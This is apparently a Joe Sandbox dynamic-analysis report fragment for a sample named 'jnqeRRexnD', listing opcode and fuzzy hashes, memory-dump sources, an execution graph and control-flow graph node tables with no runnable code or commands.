                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0198dffcca54c8a327979ca184e18e1179e26769679eb7287e54d642110c921c
                                                                                                              • Instruction ID: f86ccfe5c422f51132740e008410ac0912d8231aa3ed092e74a5fe66064f475a
                                                                                                              • Opcode Fuzzy Hash: 0198dffcca54c8a327979ca184e18e1179e26769679eb7287e54d642110c921c
                                                                                                              • Instruction Fuzzy Hash: 09219D76904240DFDB16CF50D9C4B16BF62FB84314F24C5A9DD094B656C33AE86ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                              • Instruction ID: 6f5f32a6d1271c9d6d84aafd67363d585434f58f5f176df7c01614a8e70ead3d
                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                              • Instruction Fuzzy Hash: 1111E172904340CFCB12CF00D5C0B16BF72FB94324F24C2A9D9094B656C33AE85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction ID: f7620eb85aafb9db2d789c3fd128fae872df485902a39bf68a5db1f807bf336f
                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction Fuzzy Hash: 4711BB75504780CFCB11CF14D5C4B15BBB2FB84318F28C6AAD80D8B65AC33AD84ACBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction ID: 5a144196806037828d115823008e15df8125562e18d650ad5720593acb5bf40c
                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction Fuzzy Hash: DC118B75504380DFDB16CF14D5C4B15BBB2FF84314F28C6AAD8498B69AC33AE84ACB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e26676d8b08e28b17bdfd20fb190bb9d437ce3209c43814980d38d15679dc87
                                                                                                              • Instruction ID: 2d6fa8292551de2e4fe964ed7968a562293d1001337158e18e302d3bfeb815f7
                                                                                                              • Opcode Fuzzy Hash: 4e26676d8b08e28b17bdfd20fb190bb9d437ce3209c43814980d38d15679dc87
                                                                                                              • Instruction Fuzzy Hash: BA01DB71A053449AE7104E25DCC4B66FFE8FF51364F18C85AED098E286C7799C40D772
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b70e809b9ec3e15e31df2098a2521aaff6b3db0fe8fa445fbb789accfa6f16e1
                                                                                                              • Instruction ID: c5ac48e5b447196511c4bb9a794a4447ac30e7886cb1832bc67b8dd18bbbbdab
                                                                                                              • Opcode Fuzzy Hash: b70e809b9ec3e15e31df2098a2521aaff6b3db0fe8fa445fbb789accfa6f16e1
                                                                                                              • Instruction Fuzzy Hash: 67F062729043449EE7208E16DDC4B62FFE8EF51734F18C45AED088A286C379AC44CBB1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:16.3%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:10.4%
                                                                                                              Total number of Nodes:48
                                                                                                              Total number of Limit Nodes:9
                                                                                                              execution_graph 20158 6db9c70 20159 6db9c9d 20158->20159 20161 6dbbb7f 20159->20161 20162 6db9fa6 20159->20162 20164 6db9328 20159->20164 20162->20161 20163 6db9328 LdrInitializeThunk 20162->20163 20163->20162 20165 6db933a 20164->20165 20167 6db933f 20164->20167 20165->20162 20166 6db9a69 LdrInitializeThunk 20166->20165 20167->20165 20167->20166 20168 166e018 20169 166e024 20168->20169 20178 6db2968 20169->20178 20171 166e110 20193 6dbfc68 20171->20193 20197 6dbfc5f 20171->20197 20172 166e61f 20179 6db298a 20178->20179 20180 166e0c3 20179->20180 20183 6db9328 LdrInitializeThunk 20179->20183 20201 6db9548 20179->20201 20207 6db992c 20179->20207 20213 6db9318 20179->20213 20185 6dbf810 20180->20185 20189 6dbf801 20180->20189 20183->20180 20186 6dbf832 20185->20186 20187 6db9548 2 API calls 20186->20187 20188 6dbf8fc 20186->20188 20187->20188 20188->20171 20190 6dbf806 20189->20190 20191 6db9548 2 API calls 20190->20191 20192 6dbf8fc 20190->20192 20191->20192 20192->20171 20194 6dbfc8a 20193->20194 20195 6db9548 2 API calls 20194->20195 20196 6dbfd3a 20194->20196 20195->20196 20196->20172 20198 6dbfc8a 20197->20198 20199 6db9548 2 API calls 20198->20199 20200 6dbfd3a 20198->20200 20199->20200 20200->20172 20206 6db9579 20201->20206 20202 6db96d9 20202->20180 20203 6db9924 LdrInitializeThunk 20203->20202 20205 6db9328 LdrInitializeThunk 20205->20206 20206->20202 20206->20203 20206->20205 20211 6db97e3 20207->20211 20208 6db9924 LdrInitializeThunk 20210 6db9a81 20208->20210 20210->20180 20211->20208 20212 6db9328 LdrInitializeThunk 20211->20212 20212->20211 20214 6db933a 20213->20214 20218 6db933f 20213->20218 20214->20180 20215 6db9924 LdrInitializeThunk 20215->20214 20217 6db9328 LdrInitializeThunk 20217->20218 20218->20214 20218->20215 20218->20217

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 147 1667118-166713b 148 1667146-1667166 147->148 149 166713d-1667143 147->149 152 166716d-1667174 148->152 153 1667168 148->153 149->148 155 1667176-1667181 152->155 154 16674fc-1667505 153->154 156 1667187-166719a 155->156 157 166750d-1667519 155->157 160 16671b0-16671cb 156->160 161 166719c-16671aa 156->161 162 1667581-1667588 157->162 163 166751b-1667521 157->163 171 16671ef-16671f2 160->171 172 16671cd-16671d3 160->172 161->160 169 1667484-166748b 161->169 164 1667589-16675eb 162->164 163->164 165 1667523-1667549 163->165 178 1667552-1667556 165->178 179 166754b-1667550 165->179 169->154 175 166748d-166748f 169->175 176 166734c-1667352 171->176 177 16671f8-16671fb 171->177 173 16671d5 172->173 174 16671dc-16671df 172->174 173->174 173->176 180 1667212-1667218 173->180 181 166743e-1667441 173->181 174->180 182 16671e1-16671e4 174->182 183 1667491-1667496 175->183 184 166749e-16674a4 175->184 176->181 185 1667358-166735d 176->185 177->176 186 1667201-1667207 177->186 187 166755c-166755d 178->187 179->187 192 166721e-1667220 180->192 193 166721a-166721c 180->193 194 1667447-166744d 181->194 195 1667508 181->195 188 166727e-1667284 182->188 189 16671ea 182->189 183->184 184->157 190 16674a6-16674ab 184->190 185->181 186->176 191 166720d 186->191 188->181 198 166728a-1667290 188->198 189->181 196 16674f0-16674f3 190->196 197 16674ad-16674b2 190->197 191->181 199 166722a-1667233 192->199 193->199 200 1667472-1667476 194->200 201 166744f-1667457 194->201 195->157 196->195 202 16674f5-16674fa 196->202 197->195 203 16674b4 197->203 204 1667296-1667298 198->204 205 1667292-1667294 198->205 207 1667246-166726e 199->207 208 1667235-1667240 199->208 200->169 209 1667478-166747e 200->209 201->157 206 166745d-166746c 201->206 202->154 202->175 210 16674bb-16674c0 203->210 211 16672a2-16672b9 204->211 205->211 206->160 206->200 229 1667274-1667279 207->229 230 1667362-1667398 207->230 208->181 208->207 209->155 209->169 213 16674e2-16674e4 210->213 214 16674c2-16674c4 210->214 221 16672e4-166730b 211->221 222 16672bb-16672d4 211->222 213->195 217 16674e6-16674e9 213->217 218 16674c6-16674cb 214->218 219 16674d3-16674d9 214->219 217->196 218->219 219->157 224 16674db-16674e0 219->224 221->195 235 1667311-1667314 221->235 222->230 233 16672da-16672df 222->233 224->213 225 16674b6-16674b9 224->225 225->195 225->210 229->230 236 16673a5-16673ad 230->236 237 166739a-166739e 230->237 233->230 235->195 238 166731a-1667343 235->238 236->195 241 16673b3-16673b8 236->241 239 16673a0-16673a3 237->239 240 16673bd-16673c1 237->240 238->230 253 1667345-166734a 238->253 239->236 239->240 242 16673c3-16673c9 240->242 243 16673e0-16673e4 240->243 241->181 242->243 247 16673cb-16673d3 242->247 245 16673e6-16673ec 243->245 246 16673ee-166740d call 16676f1 243->246 245->246 250 1667413-1667417 245->250 246->250 247->195 248 16673d9-16673de 247->248 248->181 250->181 251 1667419-1667435 250->251 251->181 253->230
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (osq$(osq$(osq$,wq$,wq
                                                                                                              • API String ID: 0-1903262254
                                                                                                              • Opcode ID: 642c0b534f542e87fcf525cfc283897f5c125b6181d866c29651d59508e8534c
                                                                                                              • Instruction ID: f2563a33bc674ab9a9e1c2b6164d0e1b69ca78892db20aafe459a2b9bf0590be
                                                                                                              • Opcode Fuzzy Hash: 642c0b534f542e87fcf525cfc283897f5c125b6181d866c29651d59508e8534c
                                                                                                              • Instruction Fuzzy Hash: 2CF13D70A01159CFDB15CF69CC84AADBBBABF88318F558069E905EB365DB30ED41CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 366 166c146-166c158 367 166c184 366->367 368 166c15a-166c172 366->368 369 166c186-166c18a 367->369 372 166c174-166c179 368->372 373 166c17b-166c17e 368->373 372->369 374 166c180-166c182 373->374 375 166c18b-166c199 373->375 374->367 374->368 377 166c1fa-166c200 375->377 378 166c19b-166c1a1 375->378 379 166c202-166c2ac call 16641a0 call 1663cc0 377->379 378->379 380 166c1a3-166c1c8 378->380 392 166c2b3-166c2d4 call 1665658 379->392 393 166c2ae 379->393 381 166c1cf-166c1f9 380->381 382 166c1ca 380->382 381->377 382->381 395 166c2d9-166c2e4 392->395 393->392 396 166c2e6 395->396 397 166c2eb-166c2ef 395->397 396->397 398 166c2f4-166c2fb 397->398 399 166c2f1-166c2f2 397->399 401 166c302-166c310 398->401 402 166c2fd 398->402 400 166c313-166c357 399->400 406 166c3bd-166c3d4 400->406 401->400 402->401 408 166c3d6-166c3fb 406->408 409 166c359-166c36f 406->409 415 166c413 408->415 416 166c3fd-166c412 408->416 413 166c371-166c37d 409->413 414 166c399 409->414 417 166c387-166c38d 413->417 418 166c37f-166c385 413->418 419 166c39f-166c3bc 414->419 416->415 420 166c397 417->420 418->420 419->406 420->419
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: d1e5f0613efede692e70ed8fa826111a5068c3bdd24d245ea50a39b21e02cb93
                                                                                                              • Instruction ID: 3aced2d7615505e55709427e8efe4b8f9f43909133df287ea95eef17217fee0a
                                                                                                              • Opcode Fuzzy Hash: d1e5f0613efede692e70ed8fa826111a5068c3bdd24d245ea50a39b21e02cb93
                                                                                                              • Instruction Fuzzy Hash: FCA1E674E00618DFDB14CFA9D884A9DBBF6BF89300F14C06AE849AB365DB349981CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 424 1665362-1665364 425 1665366-16653a0 424->425 426 16653c4-1665484 call 16641a0 call 1663cc0 424->426 427 16653a7-16653c2 425->427 428 16653a2 425->428 438 1665486 426->438 439 166548b-16654a9 426->439 427->426 428->427 438->439 469 16654ac call 1665658 439->469 470 16654ac call 1665649 439->470 440 16654b2-16654bd 441 16654c4-16654c8 440->441 442 16654bf 440->442 443 16654cd-16654d4 441->443 444 16654ca-16654cb 441->444 442->441 446 16654d6 443->446 447 16654db-16654e9 443->447 445 16654ec-1665530 444->445 451 1665596-16655ad 445->451 446->447 447->445 453 1665532-1665548 451->453 454 16655af-16655d4 451->454 458 1665572 453->458 459 166554a-1665556 453->459 460 16655d6-16655eb 454->460 461 16655ec 454->461 464 1665578-1665595 458->464 462 1665560-1665566 459->462 463 1665558-166555e 459->463 460->461 465 1665570 462->465 463->465 464->451 465->464 469->440 470->440
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: 0a7aba432b6ee4c5dfc5fc0669dd0601bc2113a07188574c5813892b4882647e
                                                                                                              • Instruction ID: d3fb8839c98fcfd6653022eb40dfed3f085d2ecf472970d9e00fb5829788c7ab
                                                                                                              • Opcode Fuzzy Hash: 0a7aba432b6ee4c5dfc5fc0669dd0601bc2113a07188574c5813892b4882647e
                                                                                                              • Instruction Fuzzy Hash: F491D474E01218CFDB14CFA9D984A9DBBF2BF88300F14D0A9E819AB365DB349985CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 471 166c468-166c46d 472 166c4ce-166c57c call 16641a0 call 1663cc0 471->472 473 166c46f-166c498 471->473 485 166c583-166c5a4 call 1665658 472->485 486 166c57e 472->486 474 166c49f-166c4cc 473->474 475 166c49a 473->475 474->472 475->474 488 166c5a9-166c5b4 485->488 486->485 489 166c5b6 488->489 490 166c5bb-166c5bf 488->490 489->490 491 166c5c4-166c5cb 490->491 492 166c5c1-166c5c2 490->492 494 166c5d2-166c5e0 491->494 495 166c5cd 491->495 493 166c5e3-166c627 492->493 499 166c68d-166c6a4 493->499 494->493 495->494 501 166c6a6-166c6cb 499->501 502 166c629-166c63f 499->502 508 166c6e3 501->508 509 166c6cd-166c6e2 501->509 506 166c641-166c64d 502->506 507 166c669 502->507 510 166c657-166c65d 506->510 511 166c64f-166c655 506->511 512 166c66f-166c68c 507->512 509->508 513 166c667 510->513 511->513 512->499 513->512
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: fafa691a17e077950d900cbd828bd27c7832fc92d092bd07521f64ab0eea732c
                                                                                                              • Instruction ID: 5f536b12f412238eb48a9f0fcc854045353a17854f10c24989087ffd4ece7ff1
                                                                                                              • Opcode Fuzzy Hash: fafa691a17e077950d900cbd828bd27c7832fc92d092bd07521f64ab0eea732c
                                                                                                              • Instruction Fuzzy Hash: 5781D474E00658DFDB14CFAAD884A9DBBF2BF88300F14D069E859AB365DB349981CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 517 166ca08-166ca38 519 166ca3f-166cb1c call 16641a0 call 1663cc0 517->519 520 166ca3a 517->520 530 166cb23-166cb44 call 1665658 519->530 531 166cb1e 519->531 520->519 533 166cb49-166cb54 530->533 531->530 534 166cb56 533->534 535 166cb5b-166cb5f 533->535 534->535 536 166cb64-166cb6b 535->536 537 166cb61-166cb62 535->537 539 166cb72-166cb80 536->539 540 166cb6d 536->540 538 166cb83-166cbc7 537->538 544 166cc2d-166cc44 538->544 539->538 540->539 546 166cc46-166cc6b 544->546 547 166cbc9-166cbdf 544->547 553 166cc83 546->553 554 166cc6d-166cc82 546->554 551 166cbe1-166cbed 547->551 552 166cc09 547->552 555 166cbf7-166cbfd 551->555 556 166cbef-166cbf5 551->556 557 166cc0f-166cc2c 552->557 554->553 558 166cc07 555->558 556->558 557->544 558->557
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: fb5e627d082547e189743c73a3222ff16c6fd68aa0201366a6dadc8a1d5225dd
                                                                                                              • Instruction ID: 821f88b1a4d2b044b9fecaf05714faabed125b9dbd147c08a3dfcf9cecce88c4
                                                                                                              • Opcode Fuzzy Hash: fb5e627d082547e189743c73a3222ff16c6fd68aa0201366a6dadc8a1d5225dd
                                                                                                              • Instruction Fuzzy Hash: 6C81D474E00618DFDB14DFAAD884A9DBBF2BF88310F14D069E859AB365DB349981CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 650 166d278-166d2a8 651 166d2af-166d38c call 16641a0 call 1663cc0 650->651 652 166d2aa 650->652 662 166d393-166d3b4 call 1665658 651->662 663 166d38e 651->663 652->651 665 166d3b9-166d3c4 662->665 663->662 666 166d3c6 665->666 667 166d3cb-166d3cf 665->667 666->667 668 166d3d4-166d3db 667->668 669 166d3d1-166d3d2 667->669 671 166d3e2-166d3f0 668->671 672 166d3dd 668->672 670 166d3f3-166d437 669->670 676 166d49d-166d4b4 670->676 671->670 672->671 678 166d4b6-166d4db 676->678 679 166d439-166d44f 676->679 685 166d4f3 678->685 686 166d4dd-166d4f2 678->686 683 166d451-166d45d 679->683 684 166d479 679->684 687 166d467-166d46d 683->687 688 166d45f-166d465 683->688 689 166d47f-166d49c 684->689 686->685 690 166d477 687->690 688->690 689->676 690->689
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: 3fbf1890723423841d648ca47938e4b69780684b8e56fbaac932eccf5874be1c
                                                                                                              • Instruction ID: 33b1614e8dad04be7c1ec7c1e3983c64904e442f33502daacd5a829b47b220a6
                                                                                                              • Opcode Fuzzy Hash: 3fbf1890723423841d648ca47938e4b69780684b8e56fbaac932eccf5874be1c
                                                                                                              • Instruction Fuzzy Hash: E881B274E01218CFDB14DFAAD984A9DBBF6BF88300F14C069E459AB365DB309981CF10

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 562 166c738-166c768 563 166c76f-166c84c call 16641a0 call 1663cc0 562->563 564 166c76a 562->564 574 166c853-166c874 call 1665658 563->574 575 166c84e 563->575 564->563 577 166c879-166c884 574->577 575->574 578 166c886 577->578 579 166c88b-166c88f 577->579 578->579 580 166c894-166c89b 579->580 581 166c891-166c892 579->581 583 166c8a2-166c8b0 580->583 584 166c89d 580->584 582 166c8b3-166c8f7 581->582 588 166c95d-166c974 582->588 583->582 584->583 590 166c976-166c99b 588->590 591 166c8f9-166c90f 588->591 597 166c9b3 590->597 598 166c99d-166c9b2 590->598 595 166c911-166c91d 591->595 596 166c939 591->596 599 166c927-166c92d 595->599 600 166c91f-166c925 595->600 601 166c93f-166c95c 596->601 598->597 602 166c937 599->602 600->602 601->588 602->601
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: f782502597bf6e5f341679f5a5138e6967770f6b1e9caf15ebe9d499d5eed8b8
                                                                                                              • Instruction ID: 701915f146aab2b7732642bc847e661d964f7cfb21505363a547b5bee40aa5d3
                                                                                                              • Opcode Fuzzy Hash: f782502597bf6e5f341679f5a5138e6967770f6b1e9caf15ebe9d499d5eed8b8
                                                                                                              • Instruction Fuzzy Hash: CA81C374E00618DFDB14DFAAD984A9DBBF2BF88310F10C069E459AB365DB349982CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 606 166ccd8-166cd08 607 166cd0f-166cdec call 16641a0 call 1663cc0 606->607 608 166cd0a 606->608 618 166cdf3-166ce14 call 1665658 607->618 619 166cdee 607->619 608->607 621 166ce19-166ce24 618->621 619->618 622 166ce26 621->622 623 166ce2b-166ce2f 621->623 622->623 624 166ce34-166ce3b 623->624 625 166ce31-166ce32 623->625 627 166ce42-166ce50 624->627 628 166ce3d 624->628 626 166ce53-166ce97 625->626 632 166cefd-166cf14 626->632 627->626 628->627 634 166cf16-166cf3b 632->634 635 166ce99-166ceaf 632->635 642 166cf53 634->642 643 166cf3d-166cf52 634->643 639 166ceb1-166cebd 635->639 640 166ced9 635->640 644 166cec7-166cecd 639->644 645 166cebf-166cec5 639->645 641 166cedf-166cefc 640->641 641->632 643->642 646 166ced7 644->646 645->646 646->641
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: 001b533b6adc9272da9feedbf619a350de59990f3e6ff8a5b14ad5c0f6d79148
                                                                                                              • Instruction ID: ba42c9f951315d60e969d6cbad80531fe98a0461f6e258ec1aa499a844d12418
                                                                                                              • Opcode Fuzzy Hash: 001b533b6adc9272da9feedbf619a350de59990f3e6ff8a5b14ad5c0f6d79148
                                                                                                              • Instruction Fuzzy Hash: EC81B374E00618DFDB14DFAAD984A9DBBF2BF88300F14D069E459AB365DB349981CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 694 166cfaa-166cfd8 695 166cfdf-166d0bc call 16641a0 call 1663cc0 694->695 696 166cfda 694->696 706 166d0c3-166d0e4 call 1665658 695->706 707 166d0be 695->707 696->695 709 166d0e9-166d0f4 706->709 707->706 710 166d0f6 709->710 711 166d0fb-166d0ff 709->711 710->711 712 166d104-166d10b 711->712 713 166d101-166d102 711->713 715 166d112-166d120 712->715 716 166d10d 712->716 714 166d123-166d167 713->714 720 166d1cd-166d1e4 714->720 715->714 716->715 722 166d1e6-166d20b 720->722 723 166d169-166d17f 720->723 729 166d223 722->729 730 166d20d-166d222 722->730 727 166d181-166d18d 723->727 728 166d1a9 723->728 731 166d197-166d19d 727->731 732 166d18f-166d195 727->732 733 166d1af-166d1cc 728->733 730->729 734 166d1a7 731->734 732->734 733->720 734->733
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
                                                                                                              • API String ID: 0-2658838366
                                                                                                              • Opcode ID: 1fe62f9bcd9439cde700b36f3e403f6874485fd91d47196d6a79ea6954225a72
                                                                                                              • Instruction ID: b9ee583e0154f873d2beedf8bae062617cc1a0eeec6f627539d418ca06f0b892
                                                                                                              • Opcode Fuzzy Hash: 1fe62f9bcd9439cde700b36f3e403f6874485fd91d47196d6a79ea6954225a72
                                                                                                              • Instruction Fuzzy Hash: 3181A074E00218CFDB14DFAAD884A9DBBF6BF88310F14C069E459AB365DB749985CF10

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 738 16629ec-16629f6 740 1662981-166298a 738->740 741 16629f8-1662a01 738->741 742 1662990-1662999 740->742 741->742 743 1662a03-1662a3b 741->743 748 16629a0-16629c8 742->748 746 1662a5d-1662aac 743->746 747 1662a3d-1662a5c 743->747 753 1662ac7-1662acf 746->753 754 1662aae-1662ab5 746->754 757 1662ad2-1662ae6 753->757 755 1662ab7-1662abc 754->755 756 1662abe-1662ac5 754->756 755->757 756->757 760 1662afc-1662b04 757->760 761 1662ae8-1662aef 757->761 764 1662b06-1662b0a 760->764 762 1662af5-1662afa 761->762 763 1662af1-1662af3 761->763 762->764 763->764 766 1662b0c-1662b21 764->766 767 1662b6a-1662b6d 764->767 766->767 775 1662b23-1662b26 766->775 768 1662bb5-1662bbb 767->768 769 1662b6f-1662b84 767->769 770 16636b6 768->770 771 1662bc1-1662bc3 768->771 769->768 779 1662b86-1662b8a 769->779 776 16636bb-16636f0 770->776 771->770 773 1662bc9-1662bce 771->773 777 1663664-1663668 773->777 778 1662bd4 773->778 780 1662b45-1662b63 call 16602c8 775->780 781 1662b28-1662b2a 775->781 797 16636f2-166371d 776->797 798 166371f-1663881 776->798 783 166366f-16636b5 777->783 784 166366a-166366d 777->784 778->777 785 1662b92-1662bb0 call 16602c8 779->785 786 1662b8c-1662b90 779->786 780->767 781->780 787 1662b2c-1662b2f 781->787 784->776 784->783 785->768 786->768 786->785 787->767 791 1662b31-1662b43 787->791 791->767 791->780 797->798
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xwq$Xwq$Xwq$Xwq
                                                                                                              • API String ID: 0-1964751375
                                                                                                              • Opcode ID: 6bfebef4688648dd299646660ad7130e1a8fb78440a649fe23834eb826142de5
                                                                                                              • Instruction ID: 0426b9b890ea54f4540cfcceea00f415c1f9ca83b1bc3ed3ffcda2cf45cbb892
                                                                                                              • Opcode Fuzzy Hash: 6bfebef4688648dd299646660ad7130e1a8fb78440a649fe23834eb826142de5
